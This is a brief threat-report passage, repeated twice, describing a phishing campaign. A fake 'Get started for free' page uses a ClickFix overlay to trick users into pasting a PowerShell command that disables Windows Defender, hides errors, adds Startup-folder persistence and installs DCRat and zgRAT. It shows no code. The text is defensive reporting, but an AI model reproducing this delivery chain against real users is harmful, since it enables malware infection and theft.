The message includes URLs that direct users to a landing page promising a credit-cardless experience. If a user clicks the “Get started for free” button, an overlay using the ClickFix technique appears. If the user copies and pastes as instructed, a PowerShell command executes. The script disables real-time monitoring services such as Windows Defender, silences error messages to hide malicious activity, establishes persistence by creating a shortcut in a user’s Startup folder, and downloads and installs DCRat and zgRAT.
The message includes URLs that direct users to a landing page promising a credit-cardless experience. If a user clicks the “Get started for free” button, an overlay using the ClickFix technique appears. If the user copies and pastes as instructed, a PowerShell command executes. The script disables real-time monitoring services such as Windows Defender, silences error messages to hide malicious activity, establishes persistence by creating a shortcut in a user’s Startup folder, and downloads and installs DCRat and zgRAT.
|
|
